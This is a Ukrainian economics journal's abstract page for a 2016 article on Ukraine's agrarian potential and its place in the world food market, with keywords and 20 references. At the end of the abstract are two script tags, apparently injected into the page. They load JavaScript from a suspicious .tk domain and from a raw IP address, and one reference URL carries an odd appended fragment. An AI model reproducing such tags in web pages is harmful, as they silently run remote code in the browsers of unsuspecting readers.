ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 338.43
Сторінка молодого науковця

Реалізація аграрного потенціалу України на світовому продовольчому ринку / Григоренко Я.О. // Економіка АПК. - 2016. - № 10 - С. 95

Метою статті є дослідження аграрного потенціалу України та місце вітчизняного аграрного сектору на світовому продовольчому ринку. Дослідження здійснене з використанням методів статистичного і порівняльного аналізу та стратегічного менеджменту. Проведений аналіз показує, що Україна має реальні перспективи зміцнити свої позиції як провідний світовий виробник й експортер сільськогосподарської продукції, в тому числі органічної, та зробити вагомий внесок у подолання світової продовольчої кризи. Автором здійснено PESTE-аналіз розвитку аграрного сектору України, що дало змогу оцінити вплив зовнішнього середовища, включаючи політичні, економічні, соціальні, технологічні й екологічні фактори на розвиток досліджуваної сфери. Визначено ступінь впливу чинників, що сприяють розвитку аграрного сектору та факторів, що гальмують нарощування виробництва й експорт-ного потенціалу. Табл.: 3. Бібліогр.: 20.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: аграрний потенціал, світовий ринок, експорт, аграрний сектор, сільськогосподарські угіддя, органічне землеробство, ефективність

Список використаних джерел

 1. Agricultural Policy Perspectives Brief. Overview of CAP Reform 2014-2020. European Union, 2013.- http://ec.europa.eu/agriculture/policy-perspectives/policy-briefs/05_en.pdf.
 2. FAOSTAT [Електронний ресурс]. - Режим доступу: http://faostat3.fao.org/browse/area/*/E.
 3. Klinefelter D.A., Рenson J.B. Jr. Crowing Complexity of Agricultural lending Decisions // Choice. The magazine of food, farm and resouse issues. - Ist Quarter 2005. -№ 20 (1). - P. 26-36.
 4. Knutson D.R. Agricultural and Food Policy / D.R. Knutson, В.J. Penn and L.B Flinchbaugh // Person Prentice Hall. New Jersey, 2004.
 5. Rhodes V.J. (1993). The Agricultural Marketing System. 4th Edition. Scottsdale, Arizona:GorsuchScarisbrick, Publishers.
 6. Tanic S. Farm Commercialization and Income Diversification on the Road to EU Accession. Proceedings of FAO Workshop / Edited by S. Tanic,T. Lonc. - FAO, 2004. - p. 23-24.
 7. The State of Food Insecurity in the World 2015. Report [Електронний ресурс] // FAO. - Режим доступу: - http://www.fao.org/3/a-i4646e.pdf.
 8. The World of Organic Agriculture. Statistics and Emerging Trends 2016. Research Institute of Organic Agriculture (FiBL) [Електроннийресурс]. // Global organic farming statistics and news. Режим доступу: http://www.organic-world.net/yearbook/yearbook-2016.html?L=vkhqbhfxe%20%28. - Заголовок з екрану.
 9. USDA Agricultural Projections to 2019 [Електроннийресурс]. - Режимдоступу: http:www.usda.gov/archive_projections/Projections2019.pdf&gt;.
 10. Аграрний сектор економіки України (стан і перспективи розвитку) / [Присяжнюк М. В., Зубець М. В., Саблук П. Т. та ін.]; за ред. М. В. Присяжнюка, М. В. Зубця, П. Т. Саблука, В. Я. Месель-Веселяка, М. М. Федорова. - К. : ННЦ ІАЕ, 2011. - 1008 с.
 11. Береговий В.К. Проблеми продовольчої безпеки України / В.К. Береговий // Економіка АПК. - 2011. - № 5. - С. 71-78.
 12. Державна служба статистики України. Статистична інформація. - Режим доступу: http://www.ukrstat.gov.ua/ - Заголовок з екрана.
 13. Заяць В.М. Розвиток ринку сільськогосподарських земель : моногр. / В.М. Заяць. - К. : ННЦ ІАЕ, 2011. - 166 с.
 14. Іванова Н.Є. Система індикаторів продовольчої безпеки України : огляд та аналіз / Н. Є. Іванова, О. В. Балуєва // Державне управління: удосконалення та розвиток. - 2013. - № 10. - Режим доступу: http://www.dy.nayka.com.ua/?op=1&z=641.
 15. Національна доповідь про стан родючості грунтів України / Мінагрополітики, Центрдержродючість, НААН, ННЦ «Інститут ґрунтознавства та агрохімії імені О.Н.Соколовського», НУБіП, К., 2010. - 112 с.
 16. Органічне виробництво: має шанс подолати голод і глобальнее потепління [Електронний ресурс] / Український органік журнал «Organic UA». - Режим доступу: http://organic.ua/ru/lib/3075-organichne-vyrobnyctvo-maje-shans-podolaty-golod-i-globalne-poteplinnja.
 17. Попова О.Л. Сталий розвиток агросфери України: політика і механізми/ О.Л. Попова; НАН України, Ін-т екон. та прогнозув. - К., 2009. - 352 с.
 18. Українська молочна продукція має доступ на ринок ЄС /AgroPolit.com. [Електронний ресурс]. - Режим доступу: http://agropolit.com/news/519-ukrayinska-molochna-produktsiya-maye-dostup-na-rinok-yes.
 19. Юрчишин В.В. Аграрна реформа: суть і особливості розвитку / В.В. Юрчишин, О.М. Онищенко // Сучасна аграрна політика: проблеми становлення. - К., 1996. - С. 191-224.
 20. Український державний фонд підтримки фермерських господарств [Електронний ресурс]. - Режим доступу: http://udf.gov.ua/node/263.
Читати статтю: e_apk_2016_10_15.pdf